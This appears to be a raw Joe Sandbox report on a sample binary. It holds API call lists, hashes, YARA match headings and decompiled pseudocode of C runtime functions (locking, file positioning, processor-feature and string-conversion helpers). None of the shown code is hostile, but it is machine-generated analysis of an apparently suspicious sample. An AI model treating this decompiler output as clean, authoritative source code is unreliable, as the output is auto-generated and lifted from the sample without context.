                                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC423F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __getptd_noexit.LIBCMT ref: 02CC099F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __amsg_exit.LIBCMT ref: 02CC09AC
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 02CC425F
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC426F
                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02CC428C
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00422D38), ref: 02CC42B7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction ID: df74eed8aa62d6f724d738374d20d0e65367a8ab6c3f59b653d3d22975a05042
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8014E31E01610EBD739AB54D4067DEB760BF84724F61801DD814A7194C7749681DFC5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				LONG* _t21;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				LONG* _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t35 = __eflags;
                                                                                                                                                                                                          				_t29 = __edx;
                                                                                                                                                                                                          				_t25 = __ebx;
                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                          				_push(0x421490);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                          				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                          					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                          					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                          					__eflags = _t33 -  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                          						__eflags = _t33;
                                                                                                                                                                                                          						if(_t33 != 0) {
                                                                                                                                                                                                          							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                          							__eflags = _t23;
                                                                                                                                                                                                          							if(_t23 == 0) {
                                                                                                                                                                                                          								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									_push(_t33);
                                                                                                                                                                                                          									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t21 =  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                          						_t33 =  *0x422d38; // 0x2e31638
                                                                                                                                                                                                          						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                          						InterlockedIncrement(_t33);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                          					E00414067();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                          					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t33);
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(02E31638), ref: 00414050
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $2$l
                                                                                                                                                                                                          • API String ID: 0-3132104027
                                                                                                                                                                                                          • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                          • Instruction ID: bc58b239418278565ed197266239350c603c9d555335f029feeae00e40de280b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C3358442688EDF399A178C883F87BB2AB4131AF3801CEC49D66292C7B54BC7CF45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __calloc_crt
                                                                                                                                                                                                          • String ID: P$B$`$B
                                                                                                                                                                                                          • API String ID: 3494438863-235554963
                                                                                                                                                                                                          • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                          • Instruction ID: 80c7bfa7622fb9f50169b1aa87c5df75454d0a626ebd00caf64b915e2304a63a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011E3313086215BE7368F3DBC50BA52396EFC5328F68422EF615CA7A4E770D8824A58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                          			E00413610() {
                                                                                                                                                                                                          				signed long long _v12;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed long long _v28;
                                                                                                                                                                                                          				signed char _t8;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					_v20 =  *0x41fb50;
                                                                                                                                                                                                          					_v28 =  *0x41fb48;
                                                                                                                                                                                                          					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                          					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                          					asm("fld1");
                                                                                                                                                                                                          					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                          					asm("fnstsw ax");
                                                                                                                                                                                                          					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                          					if(__eax == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						return __eax;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02CB1B6D
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02CB1B96
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02CB1BA7
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02CB1BBF
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02CB1BE7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction ID: 6c128a61f589ec48abd4b1c1dbd1aa20a0c4ec541379e94615eecc77a23357a0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 651104715003547BD3309715CC98FA77F2CEFC6BA8F048114FD489B281D761A904C6B4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 02CBC9E3
                                                                                                                                                                                                          • __locking.LIBCMT ref: 02CBC9F8
                                                                                                                                                                                                            • Part of subcall function 02CBC228: __getptd_noexit.LIBCMT ref: 02CBC228
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 630670418-0
                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction ID: cb6b54c8b3d0be585b54e9950f1541efa7fafcba0538b996c270bbf4d0f7f363
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4951C671E00209AFDB12CF69C980BDDBBB1FF45358F14816AD915AB281D730EB81DB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				char _t82;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				intOrPtr* _t86;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                          				signed char _t98;
                                                                                                                                                                                                          				signed int _t99;
                                                                                                                                                                                                          				intOrPtr _t102;
                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                          				intOrPtr* _t104;
                                                                                                                                                                                                          				signed int _t111;
                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t105 = __esi;
                                                                                                                                                                                                          				_t97 = __edx;
                                                                                                                                                                                                          				_t104 = _a4;
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				_t121 = _t104;
                                                                                                                                                                                                          				if(_t104 != 0) {
                                                                                                                                                                                                          					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                          					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                          					_v8 = _t70;
                                                                                                                                                                                                          					if(__eflags < 0) {
                                                                                                                                                                                                          						 *(_t104 + 4) = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					_push(_t87);
                                                                                                                                                                                                          					_push(_t70);
                                                                                                                                                                                                          					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                          					__eflags = _t71 - _t87;
                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                          					if(_t71 < _t87) {
                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                          						return _t71 | 0xffffffff;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                          						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                          						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                          							_t73 =  *_t104;
                                                                                                                                                                                                          							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                          							_push(_t105);
                                                                                                                                                                                                          							_v16 = _t73 - _t92;
                                                                                                                                                                                                          							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                          							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                          								__eflags = _t98;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									L15:
                                                                                                                                                                                                          									__eflags = _v12 - _t87;
                                                                                                                                                                                                          									if(_v12 != _t87) {
                                                                                                                                                                                                          										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                          										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                          											_t75 = _v16 + _v12;
                                                                                                                                                                                                          											__eflags = _t75;
                                                                                                                                                                                                          											L41:
                                                                                                                                                                                                          											return _t75;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                          										__eflags = _t99 - _t87;
                                                                                                                                                                                                          										if(_t99 != _t87) {
                                                                                                                                                                                                          											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                          											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                          											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                          											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                          												L39:
                                                                                                                                                                                                          												_t66 =  &_v12;
                                                                                                                                                                                                          												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                          												__eflags =  *_t66;
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_push(2);
                                                                                                                                                                                                          											_push(0);
                                                                                                                                                                                                          											_push(_v8);
                                                                                                                                                                                                          											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(_v12);
                                                                                                                                                                                                          												_push(_v8);
                                                                                                                                                                                                          												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                          												__eflags = _t81;
                                                                                                                                                                                                          												if(_t81 >= 0) {
                                                                                                                                                                                                          													_t82 = 0x200;
                                                                                                                                                                                                          													__eflags = _a4 - 0x200;
                                                                                                                                                                                                          													if(_a4 > 0x200) {
                                                                                                                                                                                                          														L35:
                                                                                                                                                                                                          														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                          														L36:
                                                                                                                                                                                                          														_a4 = _t82;
                                                                                                                                                                                                          														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                          														L37:
                                                                                                                                                                                                          														if(__eflags != 0) {
                                                                                                                                                                                                          															_t63 =  &_a4;
                                                                                                                                                                                                          															 *_t63 = _a4 + 1;
                                                                                                                                                                                                          															__eflags =  *_t63;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                          													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                          													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                          														goto L35;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                          													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                          														goto L36;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L35;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L31:
                                                                                                                                                                                                          												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                          											_t96 = _a4 + _t84;
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												__eflags = _t84 - _t96;
                                                                                                                                                                                                          												if(_t84 >= _t96) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                          												if( *_t84 == 0xa) {
                                                                                                                                                                                                          													_t44 =  &_a4;
                                                                                                                                                                                                          													 *_t44 = _a4 + 1;
                                                                                                                                                                                                          													__eflags =  *_t44;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t84 = _t84 + 1;
                                                                                                                                                                                                          												__eflags = _t84;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v16 = _t87;
                                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t75 = _v16;
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                          								 *_t81 = 0x16;
                                                                                                                                                                                                          								goto L31;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                          							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                          							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                          							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t103 = _t92;
                                                                                                                                                                                                          							__eflags = _t103 - _t73;
                                                                                                                                                                                                          							if(_t103 >= _t73) {
                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t115 = _t73;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                          								if( *_t103 == 0xa) {
                                                                                                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                                                                                                          									_t87 = 0;
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t103 = _t103 + 1;
                                                                                                                                                                                                          								__eflags = _t103 - _t115;
                                                                                                                                                                                                          							} while (_t103 < _t115);
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				 *_t86 = 0x16;
                                                                                                                                                                                                          				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}






























                                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                                          0x0040c7a0
                                                                                                                                                                                                          0x0040c7a3
                                                                                                                                                                                                          0x0040c7a9
                                                                                                                                                                                                          0x0040c7b3
                                                                                                                                                                                                          0x0040c7b5
                                                                                                                                                                                                          0x0040c7b8
                                                                                                                                                                                                          0x0040c7bd
                                                                                                                                                                                                          0x0040c7c0
                                                                                                                                                                                                          0x0040c7c3
                                                                                                                                                                                                          0x0040c806
                                                                                                                                                                                                          0x0040c808
                                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                                          0x0040c7f9
                                                                                                                                                                                                          0x0040c7fc
                                                                                                                                                                                                          0x0040c81a
                                                                                                                                                                                                          0x0040c81e
                                                                                                                                                                                                          0x0040c8d8
                                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                                          0x0040c824
                                                                                                                                                                                                          0x0040c827
                                                                                                                                                                                                          0x0040c829
                                                                                                                                                                                                          0x0040c843
                                                                                                                                                                                                          0x0040c84a
                                                                                                                                                                                                          0x0040c84f
                                                                                                                                                                                                          0x0040c852
                                                                                                                                                                                                          0x0040c857
                                                                                                                                                                                                          0x0040c8d2
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c859
                                                                                                                                                                                                          0x0040c85b
                                                                                                                                                                                                          0x0040c85d
                                                                                                                                                                                                          0x0040c868
                                                                                                                                                                                                          0x0040c86b
                                                                                                                                                                                                          0x0040c88d
                                                                                                                                                                                                          0x0040c88f
                                                                                                                                                                                                          0x0040c892
                                                                                                                                                                                                          0x0040c895
                                                                                                                                                                                                          0x0040c89d
                                                                                                                                                                                                          0x0040c89f
                                                                                                                                                                                                          0x0040c8a6
                                                                                                                                                                                                          0x0040c8ab
                                                                                                                                                                                                          0x0040c8ae
                                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                                          0x0040c8c8
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8b0
                                                                                                                                                                                                          0x0040c8b3
                                                                                                                                                                                                          0x0040c8b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8b8
                                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
